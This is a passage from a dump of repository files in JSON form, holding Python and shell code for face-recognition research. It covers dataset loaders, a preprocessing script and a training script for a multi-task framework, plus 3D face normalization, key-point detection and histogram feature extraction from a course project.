indices\n \"\"\"\n\n def __init__(self, indices):\n self.indices = indices\n\n def __iter__(self):\n return (self.indices[i] for i in range(len(self.indices)))\n\n def __len__(self):\n return len(self.indices)\n\n\n\ndef get_train_loader(conf):\n if conf.data_mode in ['ms1m', 'concat']:\n ms1m_ds, ms1m_class_num = get_train_dataset(conf.ms1m_folder+'/imgs')\n print('ms1m loader generated')\n if conf.data_mode in ['vgg', 'concat']:\n vgg_ds, vgg_class_num = get_train_dataset(conf.vgg_folder+'/imgs')\n print('vgg loader generated') \n if conf.data_mode == 'vgg':\n ds = vgg_ds\n class_num = vgg_class_num\n elif conf.data_mode == 'ms1m':\n ds = ms1m_ds\n class_num = ms1m_class_num\n elif conf.data_mode == 'concat':\n for i,(url,label) in enumerate(vgg_ds.imgs):\n vgg_ds.imgs[i] = (url, label + ms1m_class_num)\n ds = ConcatDataset([ms1m_ds,vgg_ds])\n class_num = vgg_class_num + ms1m_class_num\n elif conf.data_mode == 'emore':\n ds, class_num = get_train_dataset(conf.emore_folder)\n loader = DataLoader(ds, batch_size=conf.batch_size, shuffle=True, pin_memory=conf.pin_memory, num_workers=conf.num_workers)\n return loader, class_num \n\n\n \ndef load_bin(path, rootdir, transform, image_size=[112,112]):\n if not rootdir.exists():\n rootdir.mkdir()\n bins, issame_list = pickle.load(open(str(path), 'rb'), encoding='bytes')\n data = bcolz.fill([len(bins), 3, image_size[0], image_size[1]], dtype=np.float32, rootdir=str(rootdir), mode='w')\n for i in range(len(bins)):\n _bin = bins[i]\n img = mx.image.imdecode(_bin).asnumpy()\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n img = Image.fromarray(img.astype(np.uint8))\n data[i, ...] 
= transform(img)\n i += 1\n if i % 1000 == 0:\n print('loading bin', i)\n print(data.shape)\n np.save(str(rootdir)+'_list', np.array(issame_list))\n return data, issame_list\n\ndef get_val_pair(path, name):\n carray = bcolz.carray(rootdir = os.path.join(path,name), mode='r')\n issame = np.load(path+'/{}_list.npy'.format(name))\n return carray, issame\n\ndef get_val_data(data_path):\n agedb_30, agedb_30_issame = get_val_pair(data_path, 'agedb_30')\n cfp_fp, cfp_fp_issame = get_val_pair(data_path, 'cfp_fp')\n lfw, lfw_issame = get_val_pair(data_path, 'lfw')\n return agedb_30, cfp_fp, lfw, agedb_30_issame, cfp_fp_issame, lfw_issame\n\ndef load_mx_rec(rec_path):\n save_path = rec_path/'imgs'\n if not save_path.exists():\n save_path.mkdir()\n imgrec = mx.recordio.MXIndexedRecordIO(str(rec_path/'train.idx'), str(rec_path/'train.rec'), 'r')\n img_info = imgrec.read_idx(0)\n header,_ = mx.recordio.unpack(img_info)\n max_idx = int(header.label[0])\n for idx in tqdm(range(1,max_idx)):\n img_info = imgrec.read_idx(idx)\n header, img = mx.recordio.unpack_img(img_info)\n label = int(header.label)\n img = Image.fromarray(img)\n label_path = save_path/str(label)\n if not label_path.exists():\n label_path.mkdir()\n img.save(label_path/'{}.jpg'.format(idx), quality=95)\n\n\n\nIMG_EXTENSIONS = ('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif', '.tiff', '.webp')\n\ndef pil_loader(path):\n # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n img = Image.open(f)\n return img.convert('RGB')\n\n\ndef accimage_loader(path):\n import accimage\n try:\n return accimage.Image(path)\n except IOError:\n # Potentially a decoding problem, fall back to PIL.Image\n return pil_loader(path)\n\n\ndef default_loader(path):\n from torchvision import get_image_backend\n if get_image_backend() == 'accimage':\n return accimage_loader(path)\n else:\n return pil_loader(path)\n\n\ndef make_dataset(dir, class_to_idx, pseudo_classes, remove_single=True, extensions=None, is_valid_file=None):\n\n images = []\n dir = os.path.expanduser(dir)\n\n\n if not ((extensions is None) ^ (is_valid_file is None)):\n raise ValueError(\"Both extensions and is_valid_file cannot be None or not None at the same time\")\n if extensions is not None:\n def is_valid_file(x):\n return has_file_allowed_extension(x, extensions)\n flag = 0\n for target in sorted(class_to_idx.keys()):\n d = os.path.join(dir, target)\n if not os.path.isdir(d):\n continue\n for root, _, fnames in sorted(os.walk(d)):\n for fname in sorted(fnames):\n path = os.path.join(root, fname)\n if is_valid_file(path):\n #item = (path, class_to_idx[target])\n if remove_single and pseudo_classes[flag] == -1:\n flag += 1\n continue\n item = (path, pseudo_classes[flag])\n flag += 1\n images.append(item)\n return images\n \n\ndef has_file_allowed_extension(filename, extensions):\n \"\"\"Checks if a file is an allowed extension.\n\n Args:\n filename (string): path to a file\n extensions (tuple of strings): extensions to consider (lowercase)\n\n Returns:\n bool: True if the filename ends with one of given extensions\n \"\"\"\n return filename.lower().endswith(extensions)\n\n \n \nclass PSEUDO(DatasetFolder):\n def __init__(self, remove_single, root, pseudo_classes, transform=None, target_transform=None,\n loader=default_loader, is_valid_file=None):\n super(PSEUDO, self).__init__(root, loader, IMG_EXTENSIONS if is_valid_file is None else None,\n transform=transform,\n target_transform=target_transform)\n \n 
self.remove_single = remove_single\n classes, class_to_idx = self._find_classes(self.root)\n self.samples = make_dataset(self.root, class_to_idx, pseudo_classes, self.remove_single, self.extensions, is_valid_file)\n self.targets = [s[1] for s in self.samples]\n self.class_num = len(set(self.targets))\n\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n\n Returns=0:\n tuple: (sample, target) where target is class_index of the target class.\n \"\"\"\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return sample, target\n\n\n def __len__(self):\n return len(self.samples)\n \n \n def _find_classes(self, dir):\n if sys.version_info >= (3, 5):\n # Faster and available in Python 3.5 and above\n classes = [d.name for d in os.scandir(dir) if d.is_dir()]\n else:\n classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]\n classes.sort()\n class_to_idx = {classes[i]: i for i in range(len(classes))}\n return classes, class_to_idx\n\n\n\ndef get_pseudo_dataset(imgs_folder, pseudo_classes, remove_single):\n split_index = imgs_folder[1]\n train_transform = trans.Compose([\n trans.RandomHorizontalFlip(),\n trans.ToTensor(),\n trans.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])\n ])\n ds = PSEUDO(remove_single, os.path.join(str(imgs_folder[0]),'split_{}'.format(split_index)), pseudo_classes, train_transform)\n class_num = ds.class_num\n print('loading pseudo {}: {} done'.format(split_index, class_num))\n return ds, class_num\n\n\ndef get_pseudo_loader(conf, index):\n \n meta_file = open(conf.meta_file,'r')\n meta = meta_file.readlines()\n meta = meta[count[index-1]:count[index]]\n pseudo_classes = [int(item.split('\\n')[0]) for item in meta]\n meta_file.close()\n \n ds, class_num = get_pseudo_dataset([conf.pseudo_folder,index], pseudo_classes)\n loader = DataLoader(ds, batch_size=conf.batch_size, shuffle=True, pin_memory=conf.pin_memory, num_workers=conf.num_workers)\n return loader, class_num \n"
},
{
"alpha_fraction": 0.633128821849823,
"alphanum_fraction": 0.6392638087272644,
"avg_line_length": 32.875,
"blob_id": "2cdce5acd2344786a03c4a2e61cda831e9aac4dc",
"content_id": "379d9d67319281ae51fd23db137fbeb043204ba0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 815,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 24,
"path": "/preprocess.py",
"repo_name": "labyrinth7x/multi-task-face-recognition-framework",
"src_encoding": "UTF-8",
"text": "\nimport shutil\nimport os\nfrom pathlib import Path\nfrom tqdm import tqdm\n\ndef generate_dataset(src, dst, meta_file):\n\n lines= open(meta_file).readlines()\n for line in tqdm(lines):\n folder, img = line.strip().split('_')\n folder = folder.split('/')[0]\n nfolder = str(os.path.join(dst,folder))\n if not os.path.exists(nfolder):\n os.makedirs(nfolder)\n shutil.copyfile(os.path.join(src,folder,img), os.path.join(dst, nfolder, img))\n\n\nif __name__=='__main__':\n generate_dataset('faces_emore/imgs', 'emore/trainset', 'lists/part0_train.list')\n print('finishing training parts')\n\n for i in tqdm(range(1,10)):\n generate_dataset('faces_emore/imgs', 'emore/testset/split_%d'%i, 'lists/part%s_test.list'%i)\n print('finishing testing parts: split %d'%i)\n\n"
},
{
"alpha_fraction": 0.6239316463470459,
"alphanum_fraction": 0.6709401607513428,
"avg_line_length": 20.272727966308594,
"blob_id": "0b54904dcb500455901f8771029faec9a14132ce",
"content_id": "3311ccc4fff0dd08dcdccd41d1506a9ed3de32af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 234,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 11,
"path": "/train_multi.sh",
"repo_name": "labyrinth7x/multi-task-face-recognition-framework",
"src_encoding": "UTF-8",
"text": "GPUS=2,3\npath='result/model/split1_labels.txt'\nsplit=1\n\nexport CUDA_VISIBLE_DEVICES=$GPUS\n\npython3.5 multitask.py -net ir_se -b 250 -w 3 \\\n -meta_file $path \\\n -pseudo_folder emore/testset \\\n -remove_single \\\n -device 2 \\\n"
}
] | 5 |
Sewasale/Course-Face3D | https://github.com/Sewasale/Course-Face3D | b93a09f71dfcf1fd92f35715d900f1354dd916e3 | 252bb6ea0a0ee0a0a27738ec694b799bddda7e0b | 1c156ee5337f13b9d7944164264738f7473aa203 | refs/heads/master | 2020-04-16T09:30:22.416038 | 2019-01-14T03:10:22 | 2019-01-14T03:10:22 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5297029614448547,
"alphanum_fraction": 0.5346534848213196,
"avg_line_length": 27.592920303344727,
"blob_id": "a44c7bcd6eb4de38912e4cf9175b763549bb7b3e",
"content_id": "bd88fcce4e6d502876044be8a3da424197bcfd7a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3232,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 113,
"path": "/face3d/face.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nfrom matplotlib import pyplot\nfrom mpl_toolkits.mplot3d import Axes3D\n\nclass Face(object):\n\n def __init__(self, abs_file):\n self.abs_file = abs_file\n self.compressed = False\n self.features = False\n self.key_points = {}\n self.reset()\n\n def reset(self):\n self.set_view(0, 0, self.abs_file.width, self.abs_file.height)\n\n def set_view(self, x_min, y_min, x_max, y_max):\n self.x_min = x_min\n self.y_min = y_min\n self.x_max = x_max\n self.y_max = y_max\n\n def center_at(self, x, y, delta_x, delta_y):\n # Translate and sanitize input\n x = int(x) + self.x_min\n y = int(y) + self.y_min\n delta_x = int(delta_x)\n delta_y = int(delta_y) \n\n # Save difference\n old_x_min = self.x_min\n old_y_min = self.y_min\n\n # Check values\n if delta_x * 2 > self.abs_file.width:\n raise ValueError(\"Delta x out of range\")\n\n if delta_y * 2 > self.abs_file.height:\n raise ValueError(\"Delta y out of range\")\n\n # X axis\n if x + delta_x > self.abs_file.width:\n self.x_min = self.abs_file.width - delta_x - delta_x\n self.x_max = self.abs_file.width\n elif x - delta_x < 0:\n self.x_min = 0\n self.x_max = delta_x + delta_x\n else:\n self.x_min = x - delta_x\n self.x_max = x + delta_x\n\n # Y axis\n if y + delta_y > self.abs_file.height:\n self.y_min = self.abs_file.height - delta_y - delta_y\n self.y_max = self.abs_file.height\n elif y - delta_y < 0:\n self.y_min = 0\n self.y_max = delta_y + delta_y\n else:\n self.y_min = y - delta_y\n self.y_max = y + delta_y\n\n # Translate each point\n for name, point in self.key_points.iteritems():\n x, y = point\n self.key_points[name] = (x + (old_x_min - self.x_min), y + (old_y_min - self.y_min))\n\n def add_key_point(name, x, y):\n self.key_points[name] = (x + self.x_min, y + self.y_min)\n\n @property\n def X(self):\n return self.abs_file.data['X'][range(self.y_min, self.y_max), :][:, range(self.x_min, self.x_max)]\n\n @property\n def Y(self):\n return self.abs_file.data['Y'][range(self.y_min, self.y_max), :][:, range(self.x_min, self.x_max)]\n\n @property\n def Z(self):\n return self.abs_file.data['Z'][range(self.y_min, self.y_max), :][:, range(self.x_min, self.x_max)]\n\n @property\n def width(self):\n return self.x_max - self.x_min \n\n @property\n def height(self):\n return self.y_max - self.y_min\n\n def plot_3d(self):\n figure = pyplot.figure()\n\n # Draw surface\n axis = Axes3D(figure)\n axis.plot_surface(X=self.X, Y=self.Y, Z=self.Z)\n\n return figure\n\n def compress(self):\n self.abs_file.data['X'] = self.X\n self.abs_file.data['Y'] = self.Y\n self.abs_file.data['Z'] = self.Z\n\n self.abs_file.col_size = self.width\n self.abs_file.row_size = self.height\n\n self.compressed = True\n self.reset()\n\n"
},
{
"alpha_fraction": 0.7365269660949707,
"alphanum_fraction": 0.7604790329933167,
"avg_line_length": 20,
"blob_id": "be0cb7db4707fbe6d65c49d4ecab3bed980aef03",
"content_id": "6ba65cb70855f934929188886df12ff831af9f2c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 8,
"path": "/face3d/__init__.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nfrom absfile import AbsFile\nfrom face import Face\nfrom database import Database"
},
{
"alpha_fraction": 0.5495901703834534,
"alphanum_fraction": 0.5719262361526489,
"avg_line_length": 31.75838851928711,
"blob_id": "acb8413392e2ab32cb2ae5d64c93ffa1da576915",
"content_id": "745dd117ff9afaad22aa4831bc815c234d452f4d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4880,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 149,
"path": "/CourseTest.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "#from __future__ import print_function\nimport Face3D as rc\n#import xlrd, xlwt\nimport os\nimport glob\n\n# def RunByParams(authenticate=None,\n# enroll=None,\n# person_id=None,\n# auto_id=False,\n# reevaluate=False,\n# depth_map=None,\n# feature_map=None,\n# similarity_matrix=None,\n# roc_curve=None,\n# draw_key_points=False,\n# database='database.db',\n# parametes='K=12,N=67'):\n\n\ndef get_person_ids():\n all_person = [os.path.basename(path)[:5] for path in os.listdir('E:/BosphorusDB/abs/')]\n return all_person\n\n\ndef get_faces(person, method):\n base_folder = 'E:/BosphorusDB/abs/'\n\n mask = base_folder + person + '_filtered/*_' + method + '.abs'\n faces = glob.glob(mask)\n\n return faces\n\ndef get_person_folder(person):\n base_folder = 'E:/BosphorusDB/abs/'\n\n return base_folder + person + '_filtered/'\n\n\ndef enroll_method(persons, method):\n print method\n\n dbName = 'FullBase'\n\n for person in persons:\n print person\n person_folder = get_person_folder(person)\n print dbName\n enroll_faces(person, person_folder, dbName, method)\n copy_to_dbs(person, dbName, method)\n\n\ndef copy_to_dbs(person_id, dbFrom, method):\n dbs = [\n ['Face', ['N', 'LFAU', 'UFAU', 'CAU', 'E']],\n ['FaceOcclusion', ['N', 'LFAU', 'UFAU', 'CAU', 'E', 'O']],\n ['FacePitchRotation', ['N', 'LFAU', 'UFAU', 'CAU', 'E', 'PR']],\n\n ['Rotation', ['YR', 'CR', 'PR']]\n ]\n\n db_from_path = './db/' + method + '_' + dbFrom + '.db'\n for dbName, masks in dbs:\n for mask in masks:\n try:\n rc.RunByParams(copy_to_database='./db/' + method + '_' + dbName + '.db',\n mask='_' + mask + '_',\n database=db_from_path)\n except:\n print 'bad face %s' % person_id\n\n\ndef enroll_faces(person_id, folder, db_name, method):\n\n try:\n rc.RunByParams(enroll=folder, person_id=person_id, database='./db/' + method + '_' + db_name + '.db', mask=method)\n except:\n print 'bad face %s' % person_id\n\n\ndef get_faces_for_db(faces, masks):\n result = []\n for mask in masks:\n result.extend([f for f in faces if ('_' + mask + '_') in f])\n\n return result\n\n\npersons = get_person_ids()\n\nmethods = ['CLE', 'MDM', 'MMF', 'MDR', 'M1R', 'M1M', 'GHA', 'GHM', 'GHR', 'BOF', 'M1A', 'BF1', 'MDA', 'MR1', 'MRK']\nfor method in methods:\n try:\n enroll_method(persons, method)\n # try:\n # rc.RunByParams(roc_curve='./roc/' + method + 'roc-curve.pdf', database=method + '.db')\n # except:\n # print 'bad method %s' % method\n except:\n print 'very bad method %s' % method\n\n\n\n#enroll_faces('bs045', ['C:/Users/SW/Music/CSU/abs/'], 'test')\n# rc.RunByParams(enroll='C:/Users/SW/Music/CSU/abs/', person_id='bs045', database='./db/' + 'test1' + '.db', mask='CLE')\n# rc.RunByParams(copy_to_database='Test_n1', mask='_N_N_1_', database='./db/' + 'test' + '.db')\n\n# wb = xlwt.Workbook()\n# ws = wb.add_sheet('Test')\n# rc.RunByParams(enroll='E:/BosphorusDB/abs/bs000_filtered/bs000_N_N_0_BOF.abs', person_id='bs000', database='BOF.db')\n# rc.RunByParams(enroll='E:/BosphorusDB/abs/bs000_filtered/bs000_N_N_1_BOF.abs', person_id='bs000', database='BOF.db')\n#\n# rc.RunByParams(enroll='E:/BosphorusDB/abs/bs104_filtered/bs104_N_N_0_BOF.abs', person_id='bs104', database='BOF.db')\n# rc.RunByParams(enroll='E:/BosphorusDB/abs/bs104_filtered/bs104_N_N_1_BOF.abs', person_id='bs104', database='BOF.db')\n# rc.RunByParams(enroll='E:/BosphorusDB/abs/bs104_filtered/bs104_N_N_2_BOF.abs', person_id='bs104', database='BOF.db')\n# rc.RunByParams(enroll='E:/BosphorusDB/abs/bs104_filtered/bs104_N_N_3_BOF.abs', person_id='bs104', database='BOF.db')\n#\n#\n#(c, result) = 
rc.RunByParams(roc_curve='E:/mm.pdf', database='BOF.db')\n\n# for i, res in enumerate(result):\n# j = 1\n# for p, s in res:\n# ws.write(i, j, p)\n# j = j + 1\n# ws.write(i, j, s)\n# j = j + 1\n#\n#\n# wb.save('E:/xl_rec.xls')\n# #\n# for i, res in enumerate(result):\n# print \"bs096_N_N_0_BOF Mathod %d\" % (i)\n# for p, s in res:\n# print \"Match with person %s with scores %s\" % (p, s)\n#\n# (c, result) = rc.RunByParams(authenticate='E:/BosphorusDB/abs/bs000_filtered/bs000_N_N_1_CLE.abs', database='BOF.db')\n#\n# for i, res in enumerate(result):\n# print \"bs000_N_N_1_CLE Mathod %d\" % (i)\n# for p, s in res:\n# print \"Match with person %s with scores %s\" % (p, s)\n#\n# (c, result) = rc.RunByParams(authenticate='E:/BosphorusDB/abs/bs000_filtered/bs000_N_N_0_CLE.abs', database='BOF.db')\n#\n# for i, res in enumerate(result):\n# print \"bs000_N_N_0_CLE Mathod %d\" % (i)\n# for p, s in res:\n# print \"Match with person %s with scores %s\" % (p, s)"
},
{
"alpha_fraction": 0.600045919418335,
"alphanum_fraction": 0.6135346293449402,
"avg_line_length": 31.935728073120117,
"blob_id": "2cbf7d642429a9158076d5dcc87157831a03642f",
"content_id": "ab76019ec929e7f50f2650ce35468a971c2d2e43",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17422,
"license_type": "permissive",
"max_line_length": 166,
"num_lines": 529,
"path": "/face3d/algorithms.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nfrom utils import intertial_axis, max_xy, min_xy, find_peak_start, find_peak_stop\n\nfrom scipy.ndimage import filters, interpolation\nfrom scipy.interpolate import griddata\nfrom scipy import stats, signal, optimize, interpolate\nfrom sklearn import metrics\n\nimport numpy\nimport scipy\nimport math\nimport pylab\nimport threading\n\ndef process(face, N, K):\n \"\"\" Apply the selected algorithms on a given face \"\"\"\n\n # Normalize face\n smooth(face)\n repair(face)\n crop(face)\n zoom(face)\n key_points(face)\n rotate(face)\n key_points(face)\n fit(face)\n\n # Extract features\n features_histogram(face, N, K)\n\ndef smooth(face):\n \"\"\" Smooth data. Removes peaks \"\"\"\n\n # Helper method\n def smooth_axis(axis):\n face.abs_file.data[axis] = filters.median_filter(face.abs_file.data[axis], size=4)\n face.abs_file.data[axis] = filters.gaussian_filter(face.abs_file.data[axis], sigma=1, mode='nearest')\n\n # Smooth it\n smooth_axis('X')\n smooth_axis('Y')\n smooth_axis('Z')\n\ndef repair(face):\n \"\"\" Fill missing data by interpolating \"\"\"\n\n # Helper method\n def interpolate_axis(axis):\n A = face.abs_file.data[axis]\n\n # Calculate parameters\n mask = numpy.isfinite(A)\n points = mask.nonzero()\n values = A[points]\n grid_coords = numpy.meshgrid(numpy.arange(0, len(A[:, 0]), 1), numpy.arange(0, len(A[0, :]), 1))\n\n # Apply interpolation\n face.abs_file.data[axis] = griddata(points, values, grid_coords, method='linear').T\n\n interpolate_axis('X')\n interpolate_axis('Y')\n interpolate_axis('Z')\n\ndef key_points(face, \n d_nose_x1=30, d_nose_x2=5, d_nose_y=5,\n d_lip_y1=25, d_lip_y2=70, d_lip_y3=4, d_lip_x1=45,\n d_chin_x=3, d_chin_y1=10, d_chin_y2=75,\n d_eye_x=2, d_eye_y=50):\n\n \"\"\"\n Rotate and zoom the face to create a full frame face. 
This is based on the\n fact that the nose is the highest point of the picture\n \"\"\"\n\n # We apply surfature to calculate the first and second derivates\n K, H, Pmax, Pmin = surfature(face)\n\n # Remove all key points \n face.key_points.clear()\n\n #\n # Nose\n #\n nose_x, nose_y = max_xy(face.Z)\n face.key_points[\"nose\"] = (nose_x, nose_y)\n\n #\n # Nose left and right\n #\n nose_left = Pmin[(nose_y - d_nose_y):(nose_y + d_nose_y), (nose_x - d_nose_x1):(nose_x - d_nose_x2)]\n nose_right = Pmin[(nose_y - d_nose_y):(nose_y + d_nose_y), (nose_x + d_nose_x2):(nose_x + d_nose_x1)]\n\n nose_left_x, nose_left_y = min_xy(nose_left, offset_x=(nose_x - d_nose_x1), offset_y=(nose_y - d_nose_y))\n nose_right_x, nose_right_y = min_xy(nose_right, offset_x=(nose_x + d_nose_x2), offset_y=(nose_y - d_nose_y))\n\n face.key_points[\"nose_left\"] = (nose_left_x, nose_left_y)\n face.key_points[\"nose_right\"] = (nose_right_x, nose_right_y)\n\n # \n # Upper, lower, left right lip\n #\n lip_y = numpy.nanargmax(Pmax[(nose_y + d_lip_y1):(nose_y + d_lip_y2), nose_x]) + (nose_y + d_lip_y1)\n lip_left = Pmax[(lip_y - d_lip_y3):(lip_y + d_lip_y3), (nose_x - d_lip_x1):nose_x]\n lip_right = Pmax[(lip_y - d_lip_y3):(lip_y + d_lip_y3), nose_x:(nose_x + d_lip_x1)]\n\n lip_left_x = find_peak_start(numpy.sum(lip_left, axis=0)) + (nose_x - d_lip_x1)\n lip_left_y = numpy.nanargmax(Pmax[(lip_y - d_lip_y3):(lip_y + d_lip_y3), lip_left_x]) + (lip_y - d_lip_y3)\n\n lip_right_x = find_peak_stop(numpy.sum(lip_right, axis=0)) + nose_x\n lip_right_y = numpy.nanargmax(Pmax[(lip_y - d_lip_y3):(lip_y + d_lip_y3), lip_right_x]) + (lip_y - d_lip_y3)\n\n face.key_points['lip'] = (nose_x, lip_y)\n face.key_points['lip_left'] = (lip_left_x, lip_left_y)\n face.key_points['lip_right'] = (lip_right_x, lip_right_y)\n\n #\n # Chin\n #\n chin = numpy.gradient(signal.bspline(face.Z[(lip_y + d_chin_y1):, nose_x], 25))\n chin_x, chin_y = nose_x, numpy.nanargmin(chin) + (lip_y + d_chin_y1)\n\n face.key_points[\"chin\"] = (chin_x, chin_y)\n\n # \n # Eyes\n #\n eye_left = Pmax[nose_left_y - d_eye_y:nose_left_y + d_eye_y, nose_left_x - d_eye_x:nose_left_x + d_eye_x]\n eye_right = Pmax[nose_right_y - d_eye_y:nose_right_y + d_eye_y, nose_right_x - d_eye_x:nose_right_x + d_eye_x]\n\n eye_left_x, eye_left_y = max_xy(eye_left, nose_left_x - d_eye_x, d_eye_y)\n eye_right_x, eye_right_y = max_xy(eye_right, nose_right_x - d_eye_x, d_eye_y)\n\n face.key_points[\"eye_left\"] = (eye_left_x, eye_left_y)\n face.key_points[\"eye_right\"] = (eye_right_x, eye_right_y)\n\n #\n # Nose face border\n #\n nose_line = numpy.gradient(face.Z[nose_y, :])\n border_nose_left_x, border_nose_left_y = numpy.nanargmax(nose_line[:lip_left_x - 10]), nose_y\n border_nose_right_x, border_nose_right_y = numpy.nanargmin(nose_line[lip_right_x:]) + lip_right_x + 10, nose_y\n\n face.key_points[\"border_nose_left\"] = (border_nose_left_x, border_nose_left_y)\n face.key_points[\"border_nose_right\"] = (border_nose_right_x, border_nose_right_y)\n\n #\n # Lip face border\n #\n lip_line = numpy.gradient(face.Z[lip_y, :])\n border_lip_left_x, border_lip_left_y = numpy.nanargmax(lip_line[:lip_left_x - 10]), lip_y\n border_lip_right_x, border_lip_right_y = numpy.nanargmin(lip_line[lip_right_x:]) + lip_right_x + 10, lip_y\n\n face.key_points[\"border_lip_left\"] = (border_lip_left_x, border_lip_left_y)\n face.key_points[\"border_lip_right\"] = (border_lip_right_x, border_lip_right_y)\n\n #\n # Forehead border\n #\n forehead_line = numpy.gradient(face.Z[nose_y - (chin_y - nose_y), :])\n 
border_forehead_left_x, border_forehead_left_y = numpy.nanargmax(forehead_line[:lip_left_x - 10]), nose_y - (chin_y - nose_y)\n border_forehead_right_x, border_forehead_right_y = numpy.nanargmin(forehead_line[lip_right_x:]) + lip_right_x + 10, nose_y - (chin_y - nose_y)\n\n face.key_points[\"border_forehead_left\"] = (border_forehead_left_x, border_forehead_left_y)\n face.key_points[\"border_forehead_right\"] = (border_forehead_right_x, border_forehead_right_y)\n\ndef rotate(face):\n \"\"\" Rotate the face by taking the mean slope of the nose and lip \"\"\"\n\n # Nose rotation\n d_nose_y = face.key_points[\"nose_left\"][1] - face.key_points[\"nose_right\"][1]\n d_nose_x = face.key_points[\"nose_right\"][0] - face.key_points[\"nose_left\"][0]\n degrees_nose = math.degrees(math.atan2(d_nose_y, d_nose_x))\n\n # Lip rotation\n d_lip_y = face.key_points[\"lip_left\"][1] - face.key_points[\"lip_right\"][1]\n d_lip_x = face.key_points[\"lip_right\"][0] - face.key_points[\"lip_left\"][0]\n degrees_lip = math.degrees(math.atan2(d_lip_y, d_lip_x))\n\n # Calculate average rotation and rotate\n degrees = (degrees_nose + degrees_lip) / 2\n face.abs_file.data['X'] = interpolation.rotate(face.abs_file.data['X'], degrees, mode='nearest', prefilter=False, reshape=False)\n face.abs_file.data['Y'] = interpolation.rotate(face.abs_file.data['Y'], degrees, mode='nearest', prefilter=False, reshape=False)\n face.abs_file.data['Z'] = interpolation.rotate(face.abs_file.data['Z'], degrees, mode='nearest', prefilter=False, reshape=False)\n\ndef zoom(face):\n \"\"\" Move everything such that nose is at depth 0 \"\"\"\n\n # Correct the nose tip to be at 0\n point = max_xy(face.Z)\n\n face.abs_file.data['X'] = face.abs_file.data['X'] + abs(face.X[point])\n face.abs_file.data['Y'] = face.abs_file.data['Y'] + abs(face.Y[point])\n face.abs_file.data['Z'] = face.abs_file.data['Z'] + abs(face.Z[point])\n\ndef fit(face):\n \"\"\" Crops the image to face width and face height \"\"\"\n\n chin_x, chin_y = face.key_points[\"chin\"]\n nose_x, nose_y = face.key_points[\"nose\"]\n\n border_lip_left_x, border_lip_left_y = face.key_points[\"border_lip_left\"]\n border_lip_right_x, border_lip_right_y = face.key_points[\"border_lip_right\"]\n\n border_forehead_left_x, border_forehead_left_y = face.key_points[\"border_forehead_left\"]\n border_forehead_right_x, border_forehead_right_y = face.key_points[\"border_forehead_right\"]\n\n golden_ratio = 1.61803399\n face_height = (chin_y - nose_y) + (chin_y - nose_y) * golden_ratio\n #face_width = stats.nanmean(numpy.array([border_forehead_right_x, border_lip_right_x])) - stats.nanmean(numpy.array([border_forehead_left_x + border_lip_left_x]))\n face_width = face_height / golden_ratio\n\n # Overscan\n face_height = face_height * 0.90\n face_width = face_width * 0.95\n\n # Fit region\n face.center_at(nose_x, chin_y - (face_height / 2.0), face_width / 2.0, face_height / 2.0)\n\ndef crop(face):\n \"\"\" \n Crop the image to remove as much unneeded information as possible. 
This\n works by applying PCA to find the torso and then find the nose.\n\n The result is a view that is centered at the nose.\n \"\"\"\n\n # Reset image first to make sure we take all of the image\n face.reset()\n\n # Calculate the position of the image\n masked_z = numpy.ma.masked_array(face.Z, numpy.isnan(face.Z))\n x, y, covariance = intertial_axis(masked_z)\n\n # Center at the point\n overscan_x = face.width * 0.25\n overscan_y = face.height * 0.25\n face.center_at(x, y, overscan_x, overscan_y)\n\n # Calculate max Z-value x and y\n x, y = max_xy(face.Z)\n\n # Set view to center of nose\n face.center_at(x, y, face.width / 2.0, face.height / 2.0)\n\ndef features_histogram(face, N=67, K=12):\n \"\"\"\n From 'A 3D Face Recognition Algorithm Using Histogram-based Features'\n \"\"\"\n\n # It only works with non-nan values\n masked_z = numpy.ma.masked_array(face.Z, numpy.isnan(face.Z))\n results = []\n\n # Split the complete Z matrix into N smaller Zi\n for i, Zi in zip(range(N), numpy.array_split(masked_z, N)):\n result, temp = numpy.histogram(Zi, bins=K, range=(Zi.min(), Zi.max()), density=False)\n results.append(result)\n\n # Convert back to array\n face.features = (\"histogram\", numpy.array(results).reshape(-1), (N, K))\n\ndef distance_histogram_city_block(face1, face2):\n \"\"\" \n Calculate the City Block distance of two histogram feature vectors \n \"\"\"\n\n def _func(U, V, U_V):\n return numpy.sum([ numpy.abs(Ui - Vi) for Ui, Vi in U_V ])\n\n return distance_histogram(face1, face2, _func)\n\ndef 